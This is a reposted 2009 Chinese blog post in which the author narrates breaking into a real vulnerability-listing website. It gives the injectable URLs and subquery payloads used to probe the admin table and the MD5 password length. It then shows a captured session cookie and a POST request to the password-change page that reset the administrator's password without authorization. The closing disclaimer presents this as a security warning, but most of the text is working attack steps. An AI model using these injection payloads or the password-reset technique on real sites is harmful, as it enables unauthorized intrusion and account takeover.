首页 电脑 电脑学堂 查看内容

再次对网嗅的探测

2009-2-8 04:19 777 0

摘要: [原创]最近的sql injection好象很好我也了解到他分两种,一种是暂时性的为了达到某个目的而出现的;第二种是永久性的,可以修改服务器配置。ok,去网嗅看看来到漏...
关键词: netsill loudong list 20 漏洞 asp http admin 错误 密码

[原创]最近的sql injection好象很好我也了解到他分两种,一种是暂时性的为了达到某个目的而出现的;第二种是永久性的,可以修改服务器配置。ok,去网嗅看看来到漏洞发布页面:http://www.netsill.com/loudong/list.asp?id=45还不错,习惯性的提交一个http://www.netsill.com/loudong/list.asp?id=45’好象还可以http://www.netsill.com/loudong/list.asp?id=45;也好象还不错进行渗透吧。。。提交个http://www.netsill.com/loudong/list.asp?id=45 and 1=1吧狂晕。microsoft vbscript 运行时错误 错误 '800a01f4'  变量未定义: 'reponse' /loudong/list.asp,行111 出现这个,提交1=2,再晕一样的。肯定是做了一定的防御工作,不过经过一段时间的探索,(大约5分钟)。发现一个重要的漏洞,就是netsill做的防御不够多,竟然在提交:http://www.netsill.com/loudong/list.asp?id=(select%20min(id)%20from%20admin)这个的时候,下面显示:microsoft vbscript 运行时错误 错误 '800a01f4' 变量未定义: 'reponse' /loudong/list.asp,行111 而标题栏却显示:“symantec pcanywhere本地权限提升漏洞”哈哈 ,这下有戏了,,这个正好就是id=1时显示的东西,接着就不用我说了吧,继续提交http://www.netsill.com/loudong/list.asp?id=(select%20count(*)%20from%20admin%20where%20id=1%20and%20username='admin') 成功http://www.netsill.com/loudong/list.asp?id=(select%20count(*)%20from%20admin%20where%20id=1%20and%20len(password)=16) 哈哈,md5加密根据asc的进一步提交,很快得出密码但是这个是md5后的,,难道就没有办法进后台了吗?先试着暴力破解,我的机器速度慢,而且netsill这种地方应该不会有弱口令,所以我放弃了。看了envymask写的《海洋木马的漏洞》这个文章后就恍然大悟了,其实不用破解原来的密码,用winsockexpert抓个包,得到cookie: aspsessionidaqrstrtd=feefeniagijkcljakmkibelh探测修改管理员密码的页面,一般应该是这个/loudong/saveuser.asp,接着post一下:manager=admin&newpin=12345678&submit=%d0%de%b8%c4&oldmanager=admin&oldpin=f44d374c719506be成功修改。。。。。。不过郁闷的是,5分钟后,密码被改回来了,我也不想再做破坏了,把东西写出来,希望你们告诉netsill的管理员,希望能补上这个漏洞。 注:这篇文章没有什么技术性,只是想说明网络上没有绝对的安全,希望管理员注意
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部